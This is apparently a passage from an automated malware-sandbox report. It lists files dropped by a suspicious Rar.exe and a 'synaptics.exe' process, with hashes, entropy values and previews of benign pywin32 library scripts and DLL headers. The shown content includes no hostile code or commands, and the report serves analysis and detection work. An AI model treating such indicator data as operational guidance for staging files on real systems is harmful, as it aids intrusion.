                                                                                                                                                                                      Preview:""" Finds any disconnected terminal service sessions and logs them off""".import pywintypes.import win32ts.import winerror..sessions = win32ts.WTSEnumerateSessions(win32ts.WTS_CURRENT_SERVER_HANDLE).for session in sessions:. """. WTS_CONNECTSTATE_CLASS: WTSActive,WTSConnected,WTSConnectQuery,WTSShadow,WTSDisconnected,. WTSIdle,WTSListen,WTSReset,WTSDown,WTSInit. """. if session["State"] == win32ts.WTSDisconnected:. sessionid = session["SessionId"]. username = win32ts.WTSQuerySessionInformation(. win32ts.WTS_CURRENT_SERVER_HANDLE, sessionid, win32ts.WTSUserName. ). print("Logging off disconnected user:", username). try:. win32ts.WTSLogoffSession(win32ts.WTS_CURRENT_SERVER_HANDLE, sessionid, True). except pywintypes.error as e:. if e.winerror == winerror.ERROR_ACCESS_DENIED:. print("Can't kill that session:", e.strerror). else:. raise.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4317
                                                                                                                                                                                      Entropy (8bit):4.4834970191394135
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:/xp0BWGNtCJT5kD166wm0ppbSKNYD4mA6drMg:/EB9tCJSDDUWDD4mA6dog
                                                                                                                                                                                      MD5:FA8C4B2B1B0237E97E3633E46B2CB01C
                                                                                                                                                                                      SHA1:43061EC48EF63A4A826CAF08ADD75B7E400143DD
                                                                                                                                                                                      SHA-256:CAFB4C3B818FD035E620B4B78EE052637B72964CF4B307EED50439C85DDB764D
                                                                                                                                                                                      SHA-512:EF119E7443E3D6A48922496109B92D0F82283BFF78957BFAF7693FB723E885CA85F8582E8AAA02A77346A10884B241AFEBCCD08BA5E89565936953062DBBAA35
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import os..import win32api.import win32wnet.from winnetwk import *..possible_shares = []...def _doDumpHandle(handle, level=0):. indent = " " * level. while 1:. items = win32wnet.WNetEnumResource(handle, 0). if len(items) == 0:. break. for item in items:. try:. if item.dwDisplayType == RESOURCEDISPLAYTYPE_SHARE:. print(indent + "Have share with name:", item.lpRemoteName). possible_shares.append(item). elif item.dwDisplayType == RESOURCEDISPLAYTYPE_GENERIC:. print(. indent + "Have generic resource with name:", item.lpRemoteName. ). else:. # Try generic!. print(indent + "Enumerating " + item.lpRemoteName, end=" "). k = win32wnet.WNetOpenEnum(. RESOURCE_GLOBALNET, RESOURCETYPE_ANY, 0, item. ).
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3193
                                                                                                                                                                                      Entropy (8bit):4.412241136607424
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:J5O5v49qXZog2AKXC30YbYL38ltW3bIs8poj5gWLYfykTB3A0/4eql:y50qz27CkYbYT8ltWLI7poSgEJBwiil
                                                                                                                                                                                      MD5:852EC0289B940F026C47130C5914B881
                                                                                                                                                                                      SHA1:C6CA600BFD5F20D0252C945DB821AA00D4C8E8E2
                                                                                                                                                                                      SHA-256:7C6EB6F55940269610519A1B40FAC617905022F76907D252E0229AACA2A02794
                                                                                                                                                                                      SHA-512:DD654998EEB22ACB9D1BA3A6F141116959071BDC42F87C471997C66CC83567E3F2E7B0B956922E10B8E94A49162336AD07A2624239901343D2429EB330DE5670
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Generated by h2py from d:\mssdk\include\winnetwk.h.WNNC_NET_MSNET = 0x00010000.WNNC_NET_LANMAN = 0x00020000.WNNC_NET_NETWARE = 0x00030000.WNNC_NET_VINES = 0x00040000.WNNC_NET_10NET = 0x00050000.WNNC_NET_LOCUS = 0x00060000.WNNC_NET_SUN_PC_NFS = 0x00070000.WNNC_NET_LANSTEP = 0x00080000.WNNC_NET_9TILES = 0x00090000.WNNC_NET_LANTASTIC = 0x000A0000.WNNC_NET_AS400 = 0x000B0000.WNNC_NET_FTP_NFS = 0x000C0000.WNNC_NET_PATHWORKS = 0x000D0000.WNNC_NET_LIFENET = 0x000E0000.WNNC_NET_POWERLAN = 0x000F0000.WNNC_NET_BWNFS = 0x00100000.WNNC_NET_COGENT = 0x00110000.WNNC_NET_FARALLON = 0x00120000.WNNC_NET_APPLETALK = 0x00130000.WNNC_NET_INTERGRAPH = 0x00140000.WNNC_NET_SYMFONET = 0x00150000.WNNC_NET_CLEARCASE = 0x00160000.WNNC_NET_FRONTIER = 0x00170000.WNNC_NET_BMC = 0x00180000.WNNC_NET_DCE = 0x00190000.WNNC_NET_DECORB = 0x00200000.WNNC_NET_PROTSTOR = 0x00210000.WNNC_NET_FJ_REDIR = 0x00220000.WNNC_NET_DISTINCT = 0x00230000.WNNC_NET_TWINS = 0x00240000.WNNC_NET_RDR2SAMPLE = 0x00250000.RESOURCE_CONNECTED
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7364
                                                                                                                                                                                      Entropy (8bit):4.612277715258723
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:djYESt2D2KXSt7kDgt7/hJYyu8wqNP1mhr:dE1UNXSt7kDgtT9XP1mhr
                                                                                                                                                                                      MD5:8E6684A1613B87B8EADBDAF4CECE9B9B
                                                                                                                                                                                      SHA1:9203CB302F86AE37C239ED6826233665F2C7C979
                                                                                                                                                                                      SHA-256:B1AC447688BC6BD9824ECABED1A5F1FC41E0B1161192DE8036FE9D9E41F91D96
                                                                                                                                                                                      SHA-512:DA4E3572592A043C73FBB00DAA18D64DFB79994CDE4C1F120C072CB38C3B2298BDA282D933B97052A83B541789D09C464CE59E9939562F2F51584BF5426A7A4D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""".Windows Process Control..winprocess.run launches a child process and returns the exit code..Optionally, it can:. redirect stdin, stdout & stderr to files. run the command as another user. limit the process's running time. control the process window (location, size, window state, desktop).Works on Windows NT, 2000 & XP. Requires Mark Hammond's win32.extensions...This code is free for any purpose, with no warranty of any kind..-- John B. Dell'Aquila <jbd@alum.mit.edu>."""..import msvcrt.import os..import win32api.import win32con.import win32event.import win32gui.import win32process.import win32security...def logonUser(loginString):. """. Login as specified user and return handle.. loginString: 'Domain\nUser\nPassword'; for local. login use . or empty string as domain. e.g. '.\nadministrator\nsecret_password'. """. domain, user, passwd = loginString.split("\n"). return win32security.LogonUser(. user,. domain,. passwd,. w
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12288
                                                                                                                                                                                      Entropy (8bit):5.432025330493245
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:ru0gls8JSQzzAk114R2SzyVIZUf+CvwFjOrfg00y5DdJkGITzapsK/1NYvSD:Pj8T114SVI49v0jga+DYGTsK/Z
                                                                                                                                                                                      MD5:DF20C86EB75661DD6FD6C8E55F809632
                                                                                                                                                                                      SHA1:6AD4D8B7AA6135CA8843BA81CC896E3C92D44F5A
                                                                                                                                                                                      SHA-256:B1F5894857947DCC56B2BD96BB20FEEEB5A82CA8E0B4E89A9DE0A5FD97E3C883
                                                                                                                                                                                      SHA-512:880A7ED713348AA76F4BFF5AB1B8E7EDC7FFA84133531C9966D841FF9BAA1F867E1CE079EE4D68F830AE24E4349B7BA7AAA71F663E16799059E3D6DAC55248F2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Gh..Gh..Gh..N.@.Eh......Eh..S...Eh......Lh......Mh......Fh......Dh..Gh..`h......Fh......Fh......Fh..RichGh..........PE..L......d...........!.........................0...............................p............@......................... 6..`....6..d....P..t....................`..h...D1..T............................1..@............0...............................text............................... ..`.rdata..<....0......................@..@.data........@.......&..............@....rsrc...t....P.......(..............@..@.reloc..h....`.......,..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):20992
                                                                                                                                                                                      Entropy (8bit):5.796402902582657
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:6yclP60cRDyliPNYVPpRfGWYjlTbljBSmeP6mNFd1pbVMx8jPZWm7FWD:6Ji5y4PNsRfeblkSmN1pEaPZWm7FW
                                                                                                                                                                                      MD5:2A7FAD1E3E2592F10CB7BF1AA9D373A3
                                                                                                                                                                                      SHA1:C41FD641EBAEE4C84437AF863649C622881303C9
                                                                                                                                                                                      SHA-256:AFA7F989C80486274B76313F92158334D09865B31719AEBAB13467007B5C878C
                                                                                                                                                                                      SHA-512:3280D9C4F80A33940CE6056DEB16DC5134CAEDCBFC6B0FD2E695BB43303C7329A480F409F5165D50D7FD3C49128F2635714B7A7CC1ACA90BB0D0A90F84F5678B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........b.X`..X`..X`..Q...\`......Z`......H`......R`......Y`......Z`......Z`..L...]`..X`...`......Y`......Y`......Y`..RichX`..........................PE..L......d...........!.....(...&......I$.......@............................................@..........................M..X...8N.......p..d............................E..T...........................@F..@............@..T............................text...!&.......(.................. ..`.rdata.......@.......,..............@..@.data........`.......D..............@....rsrc...d....p.......H..............@..@.reloc...............L..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:C++ source, ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):30076
                                                                                                                                                                                      Entropy (8bit):5.341602934640227
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:P8Bv5BnuEpBwYAmY61w/gFQ277qiF3VeYY99IqZO4AcNZHVWqu:UdHnBwYAmY61w/727xeYqIqk49HVs
                                                                                                                                                                                      MD5:56FA1335CD7890A5FDD33CC47A3FB347
                                                                                                                                                                                      SHA1:65DDC9821823293D434F68095240C83B819F8CDF
                                                                                                                                                                                      SHA-256:BD99175F3A8A791ED5C175BF3B3D8796DB9C11D6D9FF0BBF239DEE67EEEF50C6
                                                                                                                                                                                      SHA-512:6481B7F5249ACF68B48960385921CD7CD0223C369E955034F4F28566DE8169EB625800289DCFF8CB77D4BF2ADDB599B158225190EDBAB94B08FA48386F889221
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:.#ifndef __PYWINTYPES_H__.#define __PYWINTYPES_H__..// If building under a GCC, tweak what we need..#if defined(__GNUC__) && defined(_POSIX_C_SOURCE).// python.h complains if _POSIX_C_SOURCE is already defined.#undef _POSIX_C_SOURCE.#endif..// windows rpc.h defines "small" as "char" which breaks Python's accu.h,.// so we undefine it before including python..#ifdef small.#undef small.#endif..#include "Python.h".#include "structmember.h".#include "windows.h"..// Helpers for our modules..// Some macros to help the pywin32 modules co-exist in py2x and py3k..// Creates and initializes local variables called 'module' and 'dict'...// Maybe these should all be removed - they existed to help in the py2->3.// transition..// On one hand: the code would be cleaner if they were all just re-inlined?.// On the other: high confidence everything uses the exact same patterns?.// (Regardless, *some*, eg, PYWIN_MODULE_INIT_RETURN_* should be re-inlined!)..// Use to define the function itself (ie, its name
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):512
                                                                                                                                                                                      Entropy (8bit):5.477958729644305
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:y/KVLlUA1pAZVsrPkf0rjyl3KZX43d4AQILXyJ4hs2onBMigt0lBBuaHxEM9Ar4t:C2RtWsrPJeMS4OjyJasv6OlBBVlVztmm
                                                                                                                                                                                      MD5:B4991AB509209AB025FF74AD75143879
                                                                                                                                                                                      SHA1:BCF6D86C1EEC4E53D323FC27FFB8494455E28084
                                                                                                                                                                                      SHA-256:0FB1177D185CEBE835F9E36BD4AF2CDB33F3E18C9124107D56AC4E0850706798
                                                                                                                                                                                      SHA-512:284C8B5E1B3A029B380315C76E430004614E3027123AE76202EAA3110EC9B8C5445431E2C431E34A464DC81E2B5387AAE33985DB3621E96B180AC2A96019ECDC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......l..f.........................@...s....z.d.d.l.Z.W.n...e.y.......Y.d.S.w.d.d.l.Z.e.j.D.]<Z.e.j...e...rTe.e.d...r-e...e.......d.S.e.j.d.....e...sQe.j.d.....e.j.e...d...e.j.d.<.e.e.j...e.j.d.....e.j.d.<...d.S.q.d.S.)......N..add_dll_directory..PATH..).Z.pywin32_system32..ImportError..os..__path__..path..isdir..hasattrr......environ..startswith..replace..pathsep..r....r.....MC:\Users\Public\QExvbmVOb25l\lib\site-packages\win32\lib\pywin32_bootstrap.py..<module>....s".....................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15094
                                                                                                                                                                                      Entropy (8bit):4.777558868848426
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:p9+7gM0XJNbpbCffiskBtXvyhE+RjE5LedEIq0E1G+fe:pJNlCff8yxjE5LI4v1A
                                                                                                                                                                                      MD5:370BEB77C36C0B2E840E6AB850FCE757
                                                                                                                                                                                      SHA1:0A87A029CA417DAA03D22BE6EDDFDDBAC0B54D7A
                                                                                                                                                                                      SHA-256:462659F2891D1D767EA4E7A32FC1DBBD05EC9FCFA9310ECDC0351B68F4C19ED5
                                                                                                                                                                                      SHA-512:4E274071CA052CA0D0EF5297D61D06914F0BFB3161843B3CDCFDE5A2EA0368974FD2209732A4B00A488C84A80A5AB94AD4FD430FF1E4524C6425BAA59E4DA289
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Generated by h2py from stdin.TCS_MULTILINE = 0x0200.CBRS_ALIGN_LEFT = 0x1000.CBRS_ALIGN_TOP = 0x2000.CBRS_ALIGN_RIGHT = 0x4000.CBRS_ALIGN_BOTTOM = 0x8000.CBRS_ALIGN_ANY = 0xF000.CBRS_BORDER_LEFT = 0x0100.CBRS_BORDER_TOP = 0x0200.CBRS_BORDER_RIGHT = 0x0400.CBRS_BORDER_BOTTOM = 0x0800.CBRS_BORDER_ANY = 0x0F00.CBRS_TOOLTIPS = 0x0010.CBRS_FLYBY = 0x0020.CBRS_FLOAT_MULTI = 0x0040.CBRS_BORDER_3D = 0x0080.CBRS_HIDE_INPLACE = 0x0008.CBRS_SIZE_DYNAMIC = 0x0004.CBRS_SIZE_FIXED = 0x0002.CBRS_FLOATING = 0x0001.CBRS_GRIPPER = 0x00400000.CBRS_ORIENT_HORZ = CBRS_ALIGN_TOP | CBRS_ALIGN_BOTTOM.CBRS_ORIENT_VERT = CBRS_ALIGN_LEFT | CBRS_ALIGN_RIGHT.CBRS_ORIENT_ANY = CBRS_ORIENT_HORZ | CBRS_ORIENT_VERT.CBRS_ALL = 0xFFFF.CBRS_NOALIGN = 0x00000000.CBRS_LEFT = CBRS_ALIGN_LEFT | CBRS_BORDER_RIGHT.CBRS_TOP = CBRS_ALIGN_TOP | CBRS_BORDER_BOTTOM.CBRS_RIGHT = CBRS_ALIGN_RIGHT | CBRS_BORDER_LEFT.CBRS_BOTTOM = CBRS_ALIGN_BOTTOM | CBRS_BORDER_TOP.SBPS_NORMAL = 0x0000.SBPS_NOBORDERS = 0x0100.SBPS_POPOUT = 0x0200.SB
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):46158
                                                                                                                                                                                      Entropy (8bit):5.115928989304851
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:uWtH81fEtJlkArPaYMuFRRuBa2y+A+W50QFZL34uyEY8EYlCrVicdsAQy9gX35Z5:BtH81S2UFRRuQ/+oC6ykZYZW
                                                                                                                                                                                      MD5:EF5F49B57CECD42E54C4533860FB3A3A
                                                                                                                                                                                      SHA1:48FDEA29160EFC44107120AE30E3E2FE00D18FDC
                                                                                                                                                                                      SHA-256:0E600EB9AEDF442AFA9476E1FDB3C6D9C76B7A58114DBEC736AC0060765E7D4E
                                                                                                                                                                                      SHA-512:2F3DBB1102159766DF64C517CDF45296B5AFE1F63176964156C75976CEE1C06B7C5A7B9B662F2BB86841CE5C3032881701C8552EDB7CED48FA5AC035E3E92A89
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Generated by h2py from COMMCTRL.H.WM_USER = 1024.ICC_LISTVIEW_CLASSES = 1 # listview, header.ICC_TREEVIEW_CLASSES = 2 # treeview, tooltips.ICC_BAR_CLASSES = 4 # toolbar, statusbar, trackbar, tooltips.ICC_TAB_CLASSES = 8 # tab, tooltips.ICC_UPDOWN_CLASS = 16 # updown.ICC_PROGRESS_CLASS = 32 # progress.ICC_HOTKEY_CLASS = 64 # hotkey.ICC_ANIMATE_CLASS = 128 # animate.ICC_WIN95_CLASSES = 255.ICC_DATE_CLASSES = 256 # month picker, date picker, time picker, updown.ICC_USEREX_CLASSES = 512 # comboex.ICC_COOL_CLASSES = 1024 # rebar (coolbar) control.ICC_INTERNET_CLASSES = 2048.ICC_PAGESCROLLER_CLASS = 4096 # page scroller.ICC_NATIVEFNTCTL_CLASS = 8192 # native font control.ODT_HEADER = 100.ODT_TAB = 101.ODT_LISTVIEW = 102.PY_0U = 0.NM_FIRST = PY_0U # generic to all controls.NM_LAST = PY_0U - 99.LVN_FIRST = PY_0U - 100 # listview.LVN_LAST = PY_0U - 199.HDN_FIRST = PY_0U - 300 # header.HDN_LAST = PY_0U - 399.TVN_FIRST = PY_0U - 400 # treeview.TVN_LAST = PY_0U - 499.TTN_FIRST =
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):713
                                                                                                                                                                                      Entropy (8bit):4.602382429472932
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:OV5MqI03+JYspXHXPENQoSE9Xx5rX4m5AeTbTq2LaF5epDlDDDBrqXzU10Pr3Il:OVFIO+KsNMNQoS6Xx5D4XeTy8O5evDMa
                                                                                                                                                                                      MD5:A17F92FB3695DC91A1B9042653DD2D0D
                                                                                                                                                                                      SHA1:8DAC5D28EC5A645225741837FC9429BE04B08E26
                                                                                                                                                                                      SHA-256:BE551C7BF0FCFF0736C0C8D5646F6976D22F912EA0B450CF9DF6EFF2E41F73B4
                                                                                                                                                                                      SHA-512:4BEC3127FA494DD657EC02F297B9249BCD23DBC09506C3E3D0368B76EBD1FB3A0B0B5719A0420D3A204E173467FBCB6AFBB2E927E080C00010439354A057DD3F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""".Skeleton replacement for removed dbi module..Use of objects created by this module should be replaced with native Python objects..Dates are now returned as datetime.datetime objects, but will still accept PyTime.objects also..Raw data for binary fields should be passed as buffer objects for Python 2.x,.and memoryview objects in Py3k.."""..import warnings..warnings.warn(. "dbi module is obsolete, code should now use native python datetime and buffer/memoryview objects",. DeprecationWarning,.)..import datetime..dbDate = dbiDate = datetime.datetime..try:. dbRaw = dbiRaw = buffer.except NameError:. dbRaw = dbiRaw = memoryview..# type names are still exported by odbc module.from odbc import *.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):30389
                                                                                                                                                                                      Entropy (8bit):4.7770341275289425
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:RKDYDaTFMojf23KJIi8njbxqVQNGTe1NuNN85:S4sf23K6i8n/0VQR
                                                                                                                                                                                      MD5:875D9E40BE44575D4BB3FE3967976DED
                                                                                                                                                                                      SHA1:B2F4B378C918D0F6329087E6103DEC19A32793AC
                                                                                                                                                                                      SHA-256:930DBD298A1A246A9D8060467E06DFB729BAFDFF0E0FE98EAD3352CFFB6F81B0
                                                                                                                                                                                      SHA-512:C27055A00FFCC17D0E362F2A9D61347CED34BFFD12CDBFF1987684ED0641CC86718EB26E2E80AEE8E80BCF9394DEA85B63931EF62EF9390B2AE61A0E4A7056B7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Generated by h2py from d:/msdev/include/mmsystem.h.MAXPNAMELEN = 32.MAXERRORLENGTH = 256.MAX_JOYSTICKOEMVXDNAME = 260.MM_MICROSOFT = 1.MM_MIDI_MAPPER = 1.MM_WAVE_MAPPER = 2.MM_SNDBLST_MIDIOUT = 3.MM_SNDBLST_MIDIIN = 4.MM_SNDBLST_SYNTH = 5.MM_SNDBLST_WAVEOUT = 6.MM_SNDBLST_WAVEIN = 7.MM_ADLIB = 9.MM_MPU401_MIDIOUT = 10.MM_MPU401_MIDIIN = 11.MM_PC_JOYSTICK = 12.TIME_MS = 0x0001.TIME_SAMPLES = 0x0002.TIME_BYTES = 0x0004.TIME_SMPTE = 0x0008.TIME_MIDI = 0x0010.TIME_TICKS = 0x0020.MM_JOY1MOVE = 0x3A0.MM_JOY2MOVE = 0x3A1.MM_JOY1ZMOVE = 0x3A2.MM_JOY2ZMOVE = 0x3A3.MM_JOY1BUTTONDOWN = 0x3B5.MM_JOY2BUTTONDOWN = 0x3B6.MM_JOY1BUTTONUP = 0x3B7.MM_JOY2BUTTONUP = 0x3B8.MM_MCINOTIFY = 0x3B9.MM_WOM_OPEN = 0x3BB.MM_WOM_CLOSE = 0x3BC.MM_WOM_DONE = 0x3BD.MM_WIM_OPEN = 0x3BE.MM_WIM_CLOSE = 0x3BF.MM_WIM_DATA = 0x3C0.MM_MIM_OPEN = 0x3C1.MM_MIM_CLOSE = 0x3C2.MM_MIM_DATA = 0x3C3.MM_MIM_LONGDATA = 0x3C4.MM_MIM_ERROR = 0x3C5.MM_MIM_LONGERROR = 0x3C6.MM_MOM_OPEN = 0x3C7.MM_MOM_CLOSE = 0x3C8.MM_MOM_DONE = 0x3C9.M
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6948
                                                                                                                                                                                      Entropy (8bit):5.17742075576656
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:kWxBIR46qdgb42yLuDTPhU1Wn5l2z0/LDyWnhyWACyWkhyWvgyWmyWshyWkEyWR9:kWxBIR4tpxLuDTPrkGPaWYQx
                                                                                                                                                                                      MD5:D613CD1C4C09BCB74DAC2B3044AF08F2
                                                                                                                                                                                      SHA1:79434FC6AEB15EA86A9CCC16225035AB23A1239A
                                                                                                                                                                                      SHA-256:A56A021FC24320BEB5EC5F046E7CC758FF3A0306E3D800B0252FCF8CFE661DB3
                                                                                                                                                                                      SHA-512:F00552644D534CE8E7B69E9C993BB9283FA1F3BE8BB5A3E4864F5A71CB2EF2DD0DFB700127284EA4669FD479F8560FF007DA0AD1B0EB785523A416D87E8121F5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import struct.import sys..import win32wnet..# Constants generated by h2py from nb30.h.NCBNAMSZ = 16.MAX_LANA = 254.NAME_FLAGS_MASK = 0x87.GROUP_NAME = 0x80.UNIQUE_NAME = 0x00.REGISTERING = 0x00.REGISTERED = 0x04.DEREGISTERED = 0x05.DUPLICATE = 0x06.DUPLICATE_DEREG = 0x07.LISTEN_OUTSTANDING = 0x01.CALL_PENDING = 0x02.SESSION_ESTABLISHED = 0x03.HANGUP_PENDING = 0x04.HANGUP_COMPLETE = 0x05.SESSION_ABORTED = 0x06.ALL_TRANSPORTS = "M\0\0\0".MS_NBF = "MNBF".NCBCALL = 0x10.NCBLISTEN = 0x11.NCBHANGUP = 0x12.NCBSEND = 0x14.NCBRECV = 0x15.NCBRECVANY = 0x16.NCBCHAINSEND = 0x17.NCBDGSEND = 0x20.NCBDGRECV = 0x21.NCBDGSENDBC = 0x22.NCBDGRECVBC = 0x23.NCBADDNAME = 0x30.NCBDELNAME = 0x31.NCBRESET = 0x32.NCBASTAT = 0x33.NCBSSTAT = 0x34.NCBCANCEL = 0x35.NCBADDGRNAME = 0x36.NCBENUM = 0x37.NCBUNLINK = 0x70.NCBSENDNA = 0x71.NCBCHAINSENDNA = 0x72.NCBLANSTALERT = 0x73.NCBACTION = 0x77.NCBFINDNAME = 0x78.NCBTRACE = 0x79.ASYNCH = 0x80.NRC_GOODRET = 0x00.NRC_BUFLEN = 0x01.NRC_ILLCMD = 0x03.NRC_CMDTMO = 0x05.NRC
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):22344
                                                                                                                                                                                      Entropy (8bit):5.171445425681835
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:36TxDCxTO5M0TX1w8DWlhhVFJwXJWKSM7NvBkYnn62jeHXBheO4ZLMGldeiDSOhu:3cpdSiNvmYnn62AXBhz4FM+deioh
                                                                                                                                                                                      MD5:ACDBB2AB8B92D9CCEFBB4CCD12E6D070
                                                                                                                                                                                      SHA1:FD78B196A79FB1C24299F6BBA689B0CB478EECA9
                                                                                                                                                                                      SHA-256:FE53CAA6C8A2F7CA98BCAFA3427779BBCA69ED29481B4DEAA7E5FA3AA8B0E6A3
                                                                                                                                                                                      SHA-512:D189AA75D396B8ADF47AE910B09A8654CC878B784A30883A075DAF9CE87628213B96038E72A1C37DE9C0EECAD21088DF864057C874C24C1F3D22317122D5D289
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Hacked from winnt.h..DELETE = 65536.READ_CONTROL = 131072.WRITE_DAC = 262144.WRITE_OWNER = 524288.SYNCHRONIZE = 1048576.STANDARD_RIGHTS_REQUIRED = 983040.STANDARD_RIGHTS_READ = READ_CONTROL.STANDARD_RIGHTS_WRITE = READ_CONTROL.STANDARD_RIGHTS_EXECUTE = READ_CONTROL.STANDARD_RIGHTS_ALL = 2031616.SPECIFIC_RIGHTS_ALL = 65535.ACCESS_SYSTEM_SECURITY = 16777216.MAXIMUM_ALLOWED = 33554432.GENERIC_READ = -2147483648.GENERIC_WRITE = 1073741824.GENERIC_EXECUTE = 536870912.GENERIC_ALL = 268435456..# file security permissions.FILE_READ_DATA = 1.FILE_LIST_DIRECTORY = 1.FILE_WRITE_DATA = 2.FILE_ADD_FILE = 2.FILE_APPEND_DATA = 4.FILE_ADD_SUBDIRECTORY = 4.FILE_CREATE_PIPE_INSTANCE = 4.FILE_READ_EA = 8.FILE_WRITE_EA = 16.FILE_EXECUTE = 32.FILE_TRAVERSE = 32.FILE_DELETE_CHILD = 64.FILE_READ_ATTRIBUTES = 128.FILE_WRITE_ATTRIBUTES = 256.FILE_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 511.FILE_GENERIC_READ = (. STANDARD_RIGHTS_READ. | FILE_READ_DATA. | FILE_READ_ATTRIBUTES. | FILE_
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Unicode text, UTF-8 text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1283
